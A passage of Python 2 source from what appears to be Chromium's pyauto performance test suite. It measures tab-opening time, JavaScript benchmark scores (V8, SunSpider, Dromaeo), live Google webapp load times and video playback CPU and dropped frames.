"""Checks if a given process id is running.
Args:
pid: The process id of the process to check.
Returns:
True if the process is running. False if not.
"""
try:
# Note that this sends the signal 0, which should not interfere with the
# process.
os.kill(pid, 0)
except OSError, err:
if err.errno == errno.ESRCH:
return False
try:
with open('/proc/%s/status' % pid) as proc_file:
if 'zombie' in proc_file.read():
return False
except IOError:
return False
return True
def _GetAllDescendentProcesses(self, pid):
pstree_out = subprocess.check_output(['pstree', '-p', '%s' % pid])
children = re.findall('\((\d+)\)', pstree_out)
return [int(pid) for pid in children]
def _WaitForChromeExit(self, browser_info, timeout):
pid = browser_info['browser_pid']
chrome_pids = self._GetAllDescendentProcesses(pid)
initial_time = time.time()
while time.time() - initial_time < timeout:
if any([self._IsPIDRunning(pid) for pid in chrome_pids]):
time.sleep(1)
else:
logging.info('_WaitForChromeExit() took: %s seconds',
time.time() - initial_time)
return
self.fail('_WaitForChromeExit() did not finish within %s seconds' %
timeout)
def tearDown(self):
if self._IsPGOMode():
browser_info = self.GetBrowserInfo()
pid = browser_info['browser_pid']
# session_manager kills chrome without waiting for it to cleanly exit.
# Until that behavior is changed, we stop it and wait for Chrome to exit
# cleanly before restarting it. See:
# crbug.com/264717
subprocess.call(['sudo', 'pkill', '-STOP', 'session_manager'])
os.kill(pid, signal.SIGINT)
self._WaitForChromeExit(browser_info, 120)
subprocess.call(['sudo', 'pkill', '-CONT', 'session_manager'])
pyauto.PyUITest.tearDown(self)
def _IsPGOMode(self):
return 'USE_PGO' in os.environ
def _WaitForIdleCPU(self, timeout, utilization):
"""Waits for the CPU to become idle (< utilization).
Args:
timeout: The longest time in seconds to wait before throwing an error.
utilization: The CPU usage below which the system should be considered
idle (between 0 and 1.0 independent of cores/hyperthreads).
"""
time_passed = 0.0
fraction_non_idle_time = 1.0
logging.info('Starting to wait up to %fs for idle CPU...', timeout)
while fraction_non_idle_time >= utilization:
cpu_usage_start = self._GetCPUUsage()
time.sleep(2)
time_passed += 2.0
cpu_usage_end = self._GetCPUUsage()
fraction_non_idle_time = \
self._GetFractionNonIdleCPUTime(cpu_usage_start, cpu_usage_end)
logging.info('Current CPU utilization = %f.', fraction_non_idle_time)
if time_passed > timeout:
self._LogProcessActivity()
message = ('CPU did not idle after %fs wait (utilization = %f).' % (
time_passed, fraction_non_idle_time))
# crosbug.com/37389
if self._IsPGOMode():
logging.info(message)
logging.info('Still continuing because we are in PGO mode.')
return
self.fail(message)
logging.info('Wait for idle CPU took %fs (utilization = %f).',
time_passed, fraction_non_idle_time)
def _LogProcessActivity(self):
"""Logs the output of top on Linux/Mac/CrOS.
TODO: use taskmgr or similar on Windows.
"""
if self.IsLinux() or self.IsMac(): # IsLinux() also implies IsChromeOS().
logging.info('Logging current process activity using top.')
cmd = 'top -b -d1 -n1'
if self.IsMac():
cmd = 'top -l1'
p = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True)
output = p.stdout.read()
logging.info(output)
else:
logging.info('Process activity logging not implemented on this OS.')
def _AppendTab(self, url):
"""Appends a tab and increments a counter if the automation call times out.
Args:
url: The string url to which the appended tab should be navigated.
"""
if not self.AppendTab(pyauto.GURL(url)):
self._timeout_count += 1
def _MeasureElapsedTime(self, python_command, num_invocations=1):
"""Measures time (in msec) to execute a python command one or more times.
Args:
python_command: A callable.
num_invocations: An integer number of times to invoke the given command.
Returns:
The time required to execute the python command the specified number of
times, in milliseconds as a float.
"""
assert callable(python_command)
def RunCommand():
for _ in range(num_invocations):
python_command()
timer = timeit.Timer(stmt=RunCommand)
return timer.timeit(number=1) * 1000 # Convert seconds to milliseconds.
def _OutputPerfForStandaloneGraphing(self, graph_name, description, value,
units, units_x, is_stacked):
"""Outputs perf measurement data to a local folder to be graphed.
This function only applies to Chrome desktop, and assumes that environment
variable 'LOCAL_PERF_DIR' has been specified and refers to a valid directory
on the local machine.
Args:
graph_name: A string name for the graph associated with this performance
value.
description: A string description of the performance value. Should not
include spaces.
value: Either a single numeric value representing a performance
measurement, or else a list of (x, y) tuples representing one or more
long-running performance measurements, where 'x' is an x-axis value
(such as an iteration number) and 'y' is the corresponding performance
measurement. If a list of tuples is given, then the |units_x|
argument must also be specified.
units: A string representing the units of the performance measurement(s).
Should not include spaces.
units_x: A string representing the units of the x-axis values associated
with the performance measurements, such as 'iteration' if the x values
are iteration numbers. If this argument is specified, then the
|value| argument must be a list of (x, y) tuples.
is_stacked: True to draw a "stacked" graph. First-come values are
stacked at bottom by default.
"""
revision_num_file = os.path.join(self._local_perf_dir, 'last_revision.dat')
if os.path.exists(revision_num_file):
with open(revision_num_file) as f:
revision = int(f.read())
else:
revision = 0
if not self._seen_graph_lines:
# We're about to output data for a new test run.
revision += 1
# Update graphs.dat.
existing_graphs = []
graphs_file = os.path.join(self._local_perf_dir, 'graphs.dat')
if os.path.exists(graphs_file):
with open(graphs_file) as f:
existing_graphs = simplejson.loads(f.read())
is_new_graph = True
for graph in existing_graphs:
if graph['name'] == graph_name:
is_new_graph = False
break
if is_new_graph:
new_graph = {
'name': graph_name,
'units': units,
'important': False,
}
if units_x:
new_graph['units_x'] = units_x
existing_graphs.append(new_graph)
with open(graphs_file, 'w') as f:
f.write(simplejson.dumps(existing_graphs))
os.chmod(graphs_file, 0755)
# Update data file for this particular graph.
existing_lines = []
data_file = os.path.join(self._local_perf_dir, graph_name + '-summary.dat')
if os.path.exists(data_file):
with open(data_file) as f:
existing_lines = f.readlines()
existing_lines = map(
simplejson.loads, map(lambda x: x.strip(), existing_lines))
seen_key = graph_name
# We assume that the first line |existing_lines[0]| is the latest.
if units_x:
new_line = {
'rev': revision,
'traces': { description: [] }
}
if seen_key in self._seen_graph_lines:
# We've added points previously for this graph line in the current
# test execution, so retrieve the original set of points specified in
# the most recent revision in the data file.
new_line = existing_lines[0]
if not description in new_line['traces']:
new_line['traces'][description] = []
for x_value, y_value in value:
new_line['traces'][description].append([str(x_value), str(y_value)])
else:
new_line = {
'rev': revision,
'traces': { description: [str(value), str(0.0)] }
}
if is_stacked:
new_line['stack'] = True
if 'stack_order' not in new_line:
new_line['stack_order'] = []
if description not in new_line['stack_order']:
new_line['stack_order'].append(description)
if seen_key in self._seen_graph_lines:
# Update results for the most recent revision.
existing_lines[0] = new_line
else:
# New results for a new revision.
existing_lines.insert(0, new_line)
self._seen_graph_lines[seen_key] = True
existing_lines = map(simplejson.dumps, existing_lines)
with open(data_file, 'w') as f:
f.write('\n'.join(existing_lines))
os.chmod(data_file, 0755)
with open(revision_num_file, 'w') as f:
f.write(str(revision))
def _OutputPerfGraphValue(self, description, value, units,
graph_name, units_x=None, is_stacked=False):
"""Outputs a performance value to have it graphed on the performance bots.
The output format differs, depending on whether the current platform is
Chrome desktop or ChromeOS.
For ChromeOS, the performance bots have a 30-character limit on the length
of the key associated with a performance value. A key on ChromeOS is
considered to be of the form "units_description" (for example,
"milliseconds_NewTabPage"), and is created from the |units| and
|description| passed as input to this function. Any characters beyond the
length 30 limit are truncated before results are stored in the autotest
database.
Args:
description: A string description of the performance value. Should not
include spaces.
value: Either a numeric value representing a performance measurement, or
a list of values to be averaged. Lists may also contain (x, y) tuples
representing one or more performance measurements, where 'x' is an
x-axis value (such as an iteration number) and 'y' is the
corresponding performance measurement. If a list of tuples is given,
the |units_x| argument must also be specified.
units: A string representing the units of the performance measurement(s).
Should not include spaces.
graph_name: A string name for the graph associated with this performance
value. Only used on Chrome desktop.
units_x: A string representing the units of the x-axis values associated
with the performance measurements, such as 'iteration' if the x values
are iteration numbers. If this argument is specified, then the
|value| argument must be a list of (x, y) tuples.
is_stacked: True to draw a "stacked" graph. First-come values are
stacked at bottom by default.
"""
if (isinstance(value, list) and value[0] is not None and
isinstance(value[0], tuple)):
assert units_x
if units_x:
assert isinstance(value, list)
if self.IsChromeOS():
# Autotest doesn't support result lists.
autotest_value = value
if (isinstance(value, list) and value[0] is not None and
not isinstance(value[0], tuple)):
autotest_value = Mean(value)
if units_x:
# TODO(dennisjeffrey): Support long-running performance measurements on
# ChromeOS in a way that can be graphed: crosbug.com/21881.
pyauto_utils.PrintPerfResult(graph_name, description, autotest_value,
units + ' ' + units_x)
else:
# Output short-running performance results in a format understood by
# autotest.
perf_key = '%s_%s' % (units, description)
if len(perf_key) > 30:
logging.warning('The description "%s" will be truncated to "%s" '
'(length 30) when added to the autotest database.',
perf_key, perf_key[:30])
print '\n%s(\'%s\', %f)%s' % (self._PERF_OUTPUT_MARKER_PRE,
perf_key, autotest_value,
self._PERF_OUTPUT_MARKER_POST)
# Also output results in the format recognized by buildbot, for cases
# in which these tests are run on chromeOS through buildbot. Since
# buildbot supports result lists, it's ok for |value| to be a list here.
pyauto_utils.PrintPerfResult(graph_name, description, value, units)
sys.stdout.flush()
else:
# TODO(dmikurube): Support stacked graphs in PrintPerfResult.
# See http://crbug.com/122119.
if units_x:
pyauto_utils.PrintPerfResult(graph_name, description, value,
units + ' ' + units_x)
else:
pyauto_utils.PrintPerfResult(graph_name, description, value, units)
if self._local_perf_dir:
self._OutputPerfForStandaloneGraphing(
graph_name, description, value, units, units_x, is_stacked)
def _OutputEventForStandaloneGraphing(self, description, event_list):
"""Outputs event information to a local folder to be graphed.
See function _OutputEventGraphValue below for a description of an event.
This function only applies to Chrome Endure tests running on Chrome desktop,
and assumes that environment variable 'LOCAL_PERF_DIR' has been specified
and refers to a valid directory on the local machine.
Args:
description: A string description of the event. Should not include
spaces.
event_list: A list of (x, y) tuples representing one or more events
occurring during an endurance test, where 'x' is the time of the event
(in seconds since the start of the test), and 'y' is a dictionary
representing relevant data associated with that event (as key/value
pairs).
"""
revision_num_file = os.path.join(self._local_perf_dir, 'last_revision.dat')
if os.path.exists(revision_num_file):
with open(revision_num_file) as f:
revision = int(f.read())
else:
revision = 0
if not self._seen_graph_lines:
# We're about to output data for a new test run.
revision += 1
existing_lines = []
data_file = os.path.join(self._local_perf_dir, '_EVENT_-summary.dat')
if os.path.exists(data_file):
with open(data_file) as f:
existing_lines = f.readlines()
existing_lines = map(eval, map(lambda x: x.strip(), existing_lines))
seen_event_type = description
value_list = []
if seen_event_type in self._seen_graph_lines:
# We've added events previously for this event type in the current
# test execution, so retrieve the original set of values specified in
# the most recent revision in the data file.
value_list = existing_lines[0]['events'][description]
for event_time, event_data in event_list:
value_list.append([str(event_time), event_data])
new_events = {
description: value_list
}
new_line = {
'rev': revision,
'events': new_events
}
if seen_event_type in self._seen_graph_lines:
# Update results for the most recent revision.
existing_lines[0] = new_line
else:
# New results for a new revision.
existing_lines.insert(0, new_line)
self._seen_graph_lines[seen_event_type] = True
existing_lines = map(str, existing_lines)
with open(data_file, 'w') as f:
f.write('\n'.join(existing_lines))
os.chmod(data_file, 0755)
with open(revision_num_file, 'w') as f:
f.write(str(revision))
def _OutputEventGraphValue(self, description, event_list):
"""Outputs a set of events to have them graphed on the Chrome Endure bots.
An "event" can be anything recorded by a performance test that occurs at
particular times during a test execution. For example, a garbage collection
in the v8 heap can be considered an event. An event is distinguished from a
regular perf measurement in two ways: (1) an event is depicted differently
in the performance graphs than performance measurements; (2) an event can
be associated with zero or more data fields describing relevant information
associated with the event. For example, a garbage collection event will
occur at a particular time, and it may be associated with data such as
the number of collected bytes and/or the length of time it took to perform
the garbage collection.
This function only applies to Chrome Endure tests running on Chrome desktop.
Args:
description: A string description of the event. Should not include
spaces.
event_list: A list of (x, y) tuples representing one or more events
occurring during an endurance test, where 'x' is the time of the event
(in seconds since the start of the test), and 'y' is a dictionary
representing relevant data associated with that event (as key/value
pairs).
"""
pyauto_utils.PrintPerfResult('_EVENT_', description, event_list, '')
if self._local_perf_dir:
self._OutputEventForStandaloneGraphing(description, event_list)
def _PrintSummaryResults(self, description, values, units, graph_name):
"""Logs summary measurement information.
This function computes and outputs the average and standard deviation of
the specified list of value measurements. It also invokes
_OutputPerfGraphValue() with the computed *average* value, to ensure the
average value can be plotted in a performance graph.
Args:
description: A string description for the specified results.
values: A list of numeric value measurements.
units: A string specifying the units for the specified measurements.
graph_name: A string name for the graph associated with this performance
value. Only used on Chrome desktop.
"""
logging.info('Overall results for: %s', description)
if values:
logging.info(' Average: %f %s', Mean(values), units)
logging.info(' Std dev: %f %s', StandardDeviation(values), units)
self._OutputPerfGraphValue(description, values, units, graph_name)
else:
logging.info('No results to report.')
def _RunNewTabTest(self, description, open_tab_command, graph_name,
num_tabs=1):
"""Runs a perf test that involves opening new tab(s).
This helper function can be called from different tests to do perf testing
with different types of tabs. It is assumed that the |open_tab_command|
will open up a single tab.
Args:
description: A string description of the associated tab test.
open_tab_command: A callable that will open a single tab.
graph_name: A string name for the performance graph associated with this
test. Only used on Chrome desktop.
num_tabs: The number of tabs to open, i.e., the number of times to invoke
the |open_tab_command|.
"""
assert callable(open_tab_command)
timings = []
for iteration in range(self._num_iterations + 1):
orig_timeout_count = self._timeout_count
elapsed_time = self._MeasureElapsedTime(open_tab_command,
num_invocations=num_tabs)
# Only count the timing measurement if no automation call timed out.
if self._timeout_count == orig_timeout_count:
# Ignore the first iteration.
if iteration:
timings.append(elapsed_time)
logging.info('Iteration %d of %d: %f milliseconds', iteration,
self._num_iterations, elapsed_time)
self.assertTrue(self._timeout_count <= self._max_timeout_count,
msg='Test exceeded automation timeout threshold.')
self.assertEqual(1 + num_tabs, self.GetTabCount(),
msg='Did not open %d new tab(s).' % num_tabs)
for _ in range(num_tabs):
self.CloseTab(tab_index=1)
self._PrintSummaryResults(description, timings, 'milliseconds', graph_name)
def _GetConfig(self):
"""Load perf test configuration file.
Returns:
A dictionary that represents the config information.
"""
config_file = os.path.join(os.path.dirname(__file__), 'perf.cfg')
config = {'username': None,
'password': None,
'google_account_url': 'https://accounts.google.com/',
'gmail_url': 'https://www.gmail.com',
'plus_url': 'https://plus.google.com',
'docs_url': 'https://docs.google.com'}
if os.path.exists(config_file):
try:
new_config = pyauto.PyUITest.EvalDataFrom(config_file)
for key in new_config:
if new_config.get(key) is not None:
config[key] = new_config.get(key)
except SyntaxError, e:
logging.info('Could not read %s: %s', config_file, str(e))
return config
def _LoginToGoogleAccount(self, account_key='test_google_account'):
"""Logs in to a test Google account.
Login with user-defined credentials if they exist.
Else login with private test credentials if they exist.
Else fail.
Args:
account_key: The string key in private_tests_info.txt which is associated
with the test account login credentials to use. It will only
be used when fail to load user-defined credentials.
Raises:
RuntimeError: if could not get credential information.
"""
private_file = os.path.join(pyauto.PyUITest.DataDir(), 'pyauto_private',
'private_tests_info.txt')
config_file = os.path.join(os.path.dirname(__file__), 'perf.cfg')
config = self._GetConfig()
google_account_url = config.get('google_account_url')
username = config.get('username')
password = config.get('password')
if username and password:
logging.info(
'Using google account credential from %s',
os.path.join(os.path.dirname(__file__), 'perf.cfg'))
elif os.path.exists(private_file):
creds = self.GetPrivateInfo()[account_key]
username = creds['username']
password = creds['password']
logging.info(
'User-defined credentials not found,' +
' using private test credentials instead.')
else:
message = 'No user-defined or private test ' \
'credentials could be found. ' \
'Please specify credential information in %s.' \
% config_file
raise RuntimeError(message)
test_utils.GoogleAccountsLogin(
self, username, password, url=google_account_url)
self.NavigateToURL('about:blank') # Clear the existing tab.
def _GetCPUUsage(self):
"""Returns machine's CPU usage.
This function uses /proc/stat to identify CPU usage, and therefore works
only on Linux/ChromeOS.
Returns:
A dictionary with 'user', 'nice', 'system' and 'idle' values.
Sample dictionary:
{
'user': 254544,
'nice': 9,
'system': 254768,
'idle': 2859878,
}
"""
try:
f = open('/proc/stat')
cpu_usage_str = f.readline().split()
f.close()
except IOError, e:
self.fail('Could not retrieve CPU usage: ' + str(e))
return {
'user': int(cpu_usage_str[1]),
'nice': int(cpu_usage_str[2]),
'system': int(cpu_usage_str[3]),
'idle': int(cpu_usage_str[4])
}
def _GetFractionNonIdleCPUTime(self, cpu_usage_start, cpu_usage_end):
"""Computes the fraction of CPU time spent non-idling.
This function should be invoked using before/after values from calls to
_GetCPUUsage().
"""
time_non_idling_end = (cpu_usage_end['user'] + cpu_usage_end['nice'] +
cpu_usage_end['system'])
time_non_idling_start = (cpu_usage_start['user'] + cpu_usage_start['nice'] +
cpu_usage_start['system'])
total_time_end = (cpu_usage_end['user'] + cpu_usage_end['nice'] +
cpu_usage_end['system'] + cpu_usage_end['idle'])
total_time_start = (cpu_usage_start['user'] + cpu_usage_start['nice'] +
cpu_usage_start['system'] + cpu_usage_start['idle'])
return ((float(time_non_idling_end) - time_non_idling_start) /
(total_time_end - total_time_start))
def ExtraChromeFlags(self):
"""Ensures Chrome is launched with custom flags.
Returns:
A list of extra flags to pass to Chrome when it is launched.
"""
flags = super(BasePerfTest, self).ExtraChromeFlags()
# Window size impacts a variety of perf tests, ensure consistency.
flags.append('--window-size=1024,768')
if self._IsPGOMode():
flags = flags + ['--child-clean-exit', '--no-sandbox']
return flags
class TabPerfTest(BasePerfTest):
"""Tests that involve opening tabs."""
def testNewTab(self):
"""Measures time to open a new tab."""
self._RunNewTabTest('NewTabPage',
lambda: self._AppendTab('chrome://newtab'), 'open_tab')
def testNewTabFlash(self):
"""Measures time to open a new tab navigated to a flash page."""
self.assertTrue(
os.path.exists(os.path.join(self.ContentDataDir(), 'plugin',
'flash.swf')),
msg='Missing required flash data file.')
url = self.GetFileURLForContentDataPath('plugin', 'flash.swf')
self._RunNewTabTest('NewTabFlashPage', lambda: self._AppendTab(url),
'open_tab')
def test20Tabs(self):
"""Measures time to open 20 tabs."""
self._RunNewTabTest('20TabsNewTabPage',
lambda: self._AppendTab('chrome://newtab'),
'open_20_tabs', num_tabs=20)
class BenchmarkPerfTest(BasePerfTest):
"""Benchmark performance tests."""
def testV8BenchmarkSuite(self):
"""Measures score from v8 benchmark suite."""
url = self.GetFileURLForDataPath('v8_benchmark_v6', 'run.html')
def _RunBenchmarkOnce(url):
"""Runs the v8 benchmark suite once and returns the results in a dict."""
self.assertTrue(self.AppendTab(pyauto.GURL(url)),
msg='Failed to append tab for v8 benchmark suite.')
js_done = """
var val = document.getElementById("status").innerHTML;
window.domAutomationController.send(val);
"""
self.assertTrue(
self.WaitUntil(
lambda: 'Score:' in self.ExecuteJavascript(js_done, tab_index=1),
timeout=300, expect_retval=True, retry_sleep=1),
msg='Timed out when waiting for v8 benchmark score.')
js_get_results = """
var result = {};
result['final_score'] = document.getElementById("status").innerHTML;
result['all_results'] = document.getElementById("results").innerHTML;
window.domAutomationController.send(JSON.stringify(result));
"""
results = eval(self.ExecuteJavascript(js_get_results, tab_index=1))
score_pattern = '(\w+): (\d+)'
final_score = re.search(score_pattern, results['final_score']).group(2)
result_dict = {'final_score': int(final_score)}
for match in re.finditer(score_pattern, results['all_results']):
benchmark_name = match.group(1)
benchmark_score = match.group(2)
result_dict[benchmark_name] = int(benchmark_score)
self.CloseTab(tab_index=1)
return result_dict
timings = {}
for iteration in xrange(self._num_iterations + 1):
result_dict = _RunBenchmarkOnce(url)
# Ignore the first iteration.
if iteration:
for key, val in result_dict.items():
timings.setdefault(key, []).append(val)
logging.info('Iteration %d of %d:\n%s', iteration,
self._num_iterations, self.pformat(result_dict))
for key, val in timings.items():
if key == 'final_score':
self._PrintSummaryResults('V8Benchmark', val, 'score',
'v8_benchmark_final')
else:
self._PrintSummaryResults('V8Benchmark-%s' % key, val, 'score',
'v8_benchmark_individual')
def testSunSpider(self):
"""Runs the SunSpider javascript benchmark suite."""
url = self.GetFileURLForDataPath('sunspider', 'sunspider-driver.html')
self.assertTrue(self.AppendTab(pyauto.GURL(url)),
msg='Failed to append tab for SunSpider benchmark suite.')
js_is_done = """
var done = false;
if (document.getElementById("console"))
done = true;
window.domAutomationController.send(JSON.stringify(done));
"""
self.assertTrue(
self.WaitUntil(
lambda: self.ExecuteJavascript(js_is_done, tab_index=1),
timeout=300, expect_retval='true', retry_sleep=1),
msg='Timed out when waiting for SunSpider benchmark score.')
js_get_results = """
window.domAutomationController.send(
document.getElementById("console").innerHTML);
"""
# Append '<br>' to the result to simplify regular expression matching.
results = self.ExecuteJavascript(js_get_results, tab_index=1) + '<br>'
total = re.search('Total:\s*([\d.]+)ms', results).group(1)
logging.info('Total: %f ms', float(total))
self._OutputPerfGraphValue('SunSpider-total', float(total), 'ms',
'sunspider_total')
for match_category in re.finditer('\s\s(\w+):\s*([\d.]+)ms.+?<br><br>',
results):
category_name = match_category.group(1)
category_result = match_category.group(2)
logging.info('Benchmark "%s": %f ms', category_name,
float(category_result))
self._OutputPerfGraphValue('SunSpider-' + category_name,
float(category_result), 'ms',
'sunspider_individual')
for match_result in re.finditer('<br>\s\s\s\s([\w-]+):\s*([\d.]+)ms',
match_category.group(0)):
result_name = match_result.group(1)
result_value = match_result.group(2)
logging.info(' Result "%s-%s": %f ms', category_name, result_name,
float(result_value))
self._OutputPerfGraphValue(
'SunSpider-%s-%s' % (category_name, result_name),
float(result_value), 'ms', 'sunspider_individual')
def testDromaeoSuite(self):
"""Measures results from Dromaeo benchmark suite."""
url = self.GetFileURLForDataPath('dromaeo', 'index.html')
self.assertTrue(self.AppendTab(pyauto.GURL(url + '?dromaeo')),
msg='Failed to append tab for Dromaeo benchmark suite.')
js_is_ready = """
var val = document.getElementById('pause').value;
window.domAutomationController.send(val);
"""
self.assertTrue(
self.WaitUntil(
lambda: self.ExecuteJavascript(js_is_ready, tab_index=1),
timeout=30, expect_retval='Run', retry_sleep=1),
msg='Timed out when waiting for Dromaeo benchmark to load.')
js_run = """
$('#pause').val('Run').click();
window.domAutomationController.send('done');
"""
self.ExecuteJavascript(js_run, tab_index=1)
js_is_done = """
var val = document.getElementById('timebar').innerHTML;
window.domAutomationController.send(val);
"""
self.assertTrue(
self.WaitUntil(
lambda: 'Total' in self.ExecuteJavascript(js_is_done, tab_index=1),
timeout=900, expect_retval=True, retry_sleep=2),
msg='Timed out when waiting for Dromaeo benchmark to complete.')
js_get_results = """
var result = {};
result['total_result'] = $('#timebar strong').html();
result['all_results'] = {};
$('.result-item.done').each(function (i) {
var group_name = $(this).find('.test b').html().replace(':', '');
var group_results = {};
group_results['result'] =
$(this).find('span').html().replace('runs/s', '')
group_results['sub_groups'] = {}
$(this).find('li').each(function (i) {
var sub_name = $(this).find('b').html().replace(':', '');
group_results['sub_groups'][sub_name] =
$(this).text().match(/: ([\d.]+)/)[1]
});
result['all_results'][group_name] = group_results;
});
window.domAutomationController.send(JSON.stringify(result));
"""
results = eval(self.ExecuteJavascript(js_get_results, tab_index=1))
total_result = results['total_result']
logging.info('Total result: ' + total_result)
self._OutputPerfGraphValue('Dromaeo-total', float(total_result),
'runsPerSec', 'dromaeo_total')
for group_name, group in results['all_results'].iteritems():
logging.info('Benchmark "%s": %s', group_name, group['result'])
self._OutputPerfGraphValue('Dromaeo-' + group_name.replace(' ', ''),
float(group['result']), 'runsPerSec',
'dromaeo_individual')
for benchmark_name, benchmark_score in group['sub_groups'].iteritems():
logging.info(' Result "%s": %s', benchmark_name, benchmark_score)
def testSpaceport(self):
"""Measures results from Spaceport benchmark suite."""
# TODO(tonyg): Test is failing on bots. Diagnose and re-enable.
pass
# url = self.GetFileURLForDataPath('third_party', 'spaceport', 'index.html')
# self.assertTrue(self.AppendTab(pyauto.GURL(url + '?auto')),
# msg='Failed to append tab for Spaceport benchmark suite.')
#
# # The test reports results to console.log in the format "name: value".
# # Inject a bit of JS to intercept those.
# js_collect_console_log = """
# window.__pyautoresult = {};
# window.console.log = function(str) {
# if (!str) return;
# var key_val = str.split(': ');
# if (!key_val.length == 2) return;
# __pyautoresult[key_val[0]] = key_val[1];
# };
# window.domAutomationController.send('done');
# """
# self.ExecuteJavascript(js_collect_console_log, tab_index=1)
#
# def _IsDone():
# expected_num_results = 30 # The number of tests in benchmark.
# results = eval(self.ExecuteJavascript(js_get_results, tab_index=1))
# return expected_num_results == len(results)
#
# js_get_results = """
# window.domAutomationController.send(
# JSON.stringify(window.__pyautoresult));
# """
# self.assertTrue(
# self.WaitUntil(_IsDone, timeout=1200, expect_retval=True,
# retry_sleep=5),
# msg='Timed out when waiting for Spaceport benchmark to complete.')
# results = eval(self.ExecuteJavascript(js_get_results, tab_index=1))
#
# for key in results:
# suite, test = key.split('.')
# value = float(results[key])
# self._OutputPerfGraphValue(test, value, 'ObjectsAt30FPS', suite)
# self._PrintSummaryResults('Overall', [float(x) for x in results.values()],
# 'ObjectsAt30FPS', 'Overall')
class LiveWebappLoadTest(BasePerfTest):
"""Tests that involve performance measurements of live webapps.
These tests connect to live webpages (e.g., Gmail, Calendar, Docs) and are
therefore subject to network conditions. These tests are meant to generate
"ball-park" numbers only (to see roughly how long things take to occur from a
user's perspective), and are not expected to be precise.
"""
def testNewTabGmail(self):
"""Measures time to open a tab to a logged-in Gmail account.
Timing starts right before the new tab is opened, and stops as soon as the
webpage displays the substring 'Last account activity:'.
"""
EXPECTED_SUBSTRING = 'Last account activity:'
def _SubstringExistsOnPage():
js = """
var frame = document.getElementById("canvas_frame");
var divs = frame.contentDocument.getElementsByTagName("div");
for (var i = 0; i < divs.length; ++i) {
if (divs[i].innerHTML.indexOf("%s") >= 0)
window.domAutomationController.send("true");
}
window.domAutomationController.send("false");
""" % EXPECTED_SUBSTRING
return self.ExecuteJavascript(js, tab_index=1)
def _RunSingleGmailTabOpen():
self._AppendTab('http://www.gmail.com')
self.assertTrue(self.WaitUntil(_SubstringExistsOnPage, timeout=120,
expect_retval='true', retry_sleep=0.10),
msg='Timed out waiting for expected Gmail string.')
self._LoginToGoogleAccount()
self._RunNewTabTest('NewTabGmail', _RunSingleGmailTabOpen,
'open_tab_live_webapp')
def testNewTabCalendar(self):
"""Measures time to open a tab to a logged-in Calendar account.
Timing starts right before the new tab is opened, and stops as soon as the
webpage displays the calendar print button (title 'Print my calendar').
"""
EXPECTED_SUBSTRING = 'Month'
def _DivTitleStartsWith():
js = """
var divs = document.getElementsByTagName("div");
for (var i = 0; i < divs.length; ++i) {
if (divs[i].innerHTML == "%s")
window.domAutomationController.send("true");
}
window.domAutomationController.send("false");
""" % EXPECTED_SUBSTRING
return self.ExecuteJavascript(js, tab_index=1)
def _RunSingleCalendarTabOpen():
self._AppendTab('http://calendar.google.com')
self.assertTrue(self.WaitUntil(_DivTitleStartsWith, timeout=120,
expect_retval='true', retry_sleep=0.10),
msg='Timed out waiting for expected Calendar string.')
self._LoginToGoogleAccount()
self._RunNewTabTest('NewTabCalendar', _RunSingleCalendarTabOpen,
'open_tab_live_webapp')
def testNewTabDocs(self):
"""Measures time to open a tab to a logged-in Docs account.
Timing starts right before the new tab is opened, and stops as soon as the
webpage displays the expected substring 'last modified' (case insensitive).
"""
EXPECTED_SUBSTRING = 'sort'
def _SubstringExistsOnPage():
js = """
var divs = document.getElementsByTagName("div");
for (var i = 0; i < divs.length; ++i) {
if (divs[i].innerHTML.toLowerCase().indexOf("%s") >= 0)
window.domAutomationController.send("true");
}
window.domAutomationController.send("false");
""" % EXPECTED_SUBSTRING
return self.ExecuteJavascript(js, tab_index=1)
def _RunSingleDocsTabOpen():
self._AppendTab('http://docs.google.com')
self.assertTrue(self.WaitUntil(_SubstringExistsOnPage, timeout=120,
expect_retval='true', retry_sleep=0.10),
msg='Timed out waiting for expected Docs string.')
self._LoginToGoogleAccount()
self._RunNewTabTest('NewTabDocs', _RunSingleDocsTabOpen,
'open_tab_live_webapp')
class NetflixPerfTest(BasePerfTest, NetflixTestHelper):
"""Test Netflix video performance."""
def __init__(self, methodName='runTest', **kwargs):
pyauto.PyUITest.__init__(self, methodName, **kwargs)
NetflixTestHelper.__init__(self, self)
def tearDown(self):
self.SignOut()
pyauto.PyUITest.tearDown(self)
def testNetflixDroppedFrames(self):
"""Measures the Netflix video dropped frames/second. Runs for 60 secs."""
self.LoginAndStartPlaying()
self.CheckNetflixPlaying(self.IS_PLAYING,
'Player did not start playing the title.')
# Ignore first 10 seconds of video playing so we get smooth videoplayback.
time.sleep(10)
init_dropped_frames = self._GetVideoDroppedFrames()
dropped_frames = []
prev_dropped_frames = 0
for iteration in xrange(60):
# Ignoring initial dropped frames of first 10 seconds.
total_dropped_frames = self._GetVideoDroppedFrames() - init_dropped_frames
dropped_frames_last_sec = total_dropped_frames - prev_dropped_frames
dropped_frames.append(dropped_frames_last_sec)
logging.info('Iteration %d of %d: %f dropped frames in the last second',
iteration + 1, 60, dropped_frames_last_sec)
prev_dropped_frames = total_dropped_frames
# Play the video for some time.
time.sleep(1)
self._PrintSummaryResults('NetflixDroppedFrames', dropped_frames, 'frames',
'netflix_dropped_frames')
def testNetflixCPU(self):
"""Measures the Netflix video CPU usage. Runs for 60 seconds."""
self.LoginAndStartPlaying()
self.CheckNetflixPlaying(self.IS_PLAYING,
'Player did not start playing the title.')
# Ignore first 10 seconds of video playing so we get smooth videoplayback.
time.sleep(10)
init_dropped_frames = self._GetVideoDroppedFrames()
init_video_frames = self._GetVideoFrames()
cpu_usage_start = self._GetCPUUsage()
total_shown_frames = 0
# Play the video for some time.
time.sleep(60)
total_video_frames = self._GetVideoFrames() - init_video_frames
total_dropped_frames = self._GetVideoDroppedFrames() - init_dropped_frames
cpu_usage_end = self._GetCPUUsage()
fraction_non_idle_time = \
self._GetFractionNonIdleCPUTime(cpu_usage_start, cpu_usage_end)
# Counting extrapolation for utilization to play the video.
extrapolation_value = fraction_non_idle_time * \
(float(total_video_frames) + total_dropped_frames) / total_video_frames
logging.info('Netflix CPU extrapolation: %f', extrapolation_value)
self._OutputPerfGraphValue('NetflixCPUExtrapolation', extrapolation_value,
'extrapolation', 'netflix_cpu_extrapolation')
class YoutubePerfTest(BasePerfTest, YoutubeTestHelper):
"""Test Youtube video performance."""
def __init__(self, methodName='runTest', **kwargs):
pyauto.PyUITest.__init__(self, methodName, **kwargs)
YoutubeTestHelper.__init__(self, self)
